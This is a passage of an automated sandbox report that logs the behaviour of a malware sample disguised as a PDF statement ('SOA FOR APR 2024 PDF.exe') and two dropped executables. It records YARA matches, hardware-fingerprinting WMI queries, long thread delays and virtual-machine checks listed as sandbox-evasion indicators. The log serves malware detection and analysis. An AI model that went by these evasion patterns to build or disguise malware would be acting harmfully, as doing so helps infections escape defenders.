                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe, Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe, Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: Yara match File source: Process Memory Space: SOA FOR APR 2024 PDF.exe PID: 1988, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: eeBIYZL.exe PID: 7512, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: BjTxJte.exe PID: 7928, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: BjTxJte.exe PID: 7240, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeMemory allocated: E10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeMemory allocated: 2B60000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeMemory allocated: 2990000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeMemory allocated: 7630000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeMemory allocated: 6F20000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeMemory allocated: 8630000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeMemory allocated: 9630000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeMemory allocated: 9D30000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeMemory allocated: AD30000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeMemory allocated: BD30000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeMemory allocated: F00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeMemory allocated: 2810000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeMemory allocated: 4810000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeMemory allocated: 9B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeMemory allocated: 2530000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeMemory allocated: A30000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeMemory allocated: 6920000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeMemory allocated: 7920000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeMemory allocated: 7AA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeMemory allocated: 8AA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeMemory allocated: 9160000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeMemory allocated: 2BC0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeMemory allocated: 2E10000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 1490000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 2E90000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 2C50000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 7510000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 8510000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 86A0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 96A0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 9D80000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: AD80000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: BD80000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 1C60000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 3480000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 1CD0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: CC0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 28A0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 27F0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 6D40000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 7D40000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 7EC0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 8EC0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 9580000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: A580000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: B580000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 14F0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 31C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 51C0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1199953Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1199844Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1199719Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1199594Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1199484Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1199356Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1199250Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1199140Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1199031Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1198922Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1198813Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1198703Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1198594Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1198484Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1198375Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1198266Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1198156Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1198047Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1197938Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1197813Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1197688Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1197563Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1200000
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1199890
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1199781
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1199659
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1199525
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1199415
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1198938
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1197107
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1196999
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1196890
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1196773
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1196671
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1196562
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1196453
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1196343
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1196234
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1196124
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1196014
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1195906
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1195793
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1195687
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1195577
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1195468
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1195359
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1195247
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1195140
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199922
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199813
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199688
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199563
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199438
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199329
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199204
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199079
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198954
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198829
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198713
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198597
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198467
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198360
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198249
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198141
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198016
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197891
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197782
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197657
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197532
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197422
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197312
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197203
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199988
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199833
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199703
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199594
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199484
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199375
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199265
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199156
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199047
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198938
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198813
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198688
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198578
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198469
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198344
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198234
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198125
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198015
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197906
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197797
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197687
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197578
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197469
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3200
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5125
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe Window / User API: threadDelayed 2742
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe Window / User API: threadDelayed 7108
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe Window / User API: threadDelayed 2266
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe Window / User API: threadDelayed 7588
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe Window / User API: threadDelayed 2405
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe Window / User API: threadDelayed 7439
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe Window / User API: threadDelayed 5115
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe Window / User API: threadDelayed 4715
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                    Source: SOA FOR APR 2024 PDF.exe, 00000009.00000002.3275075106.0000000000BF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV
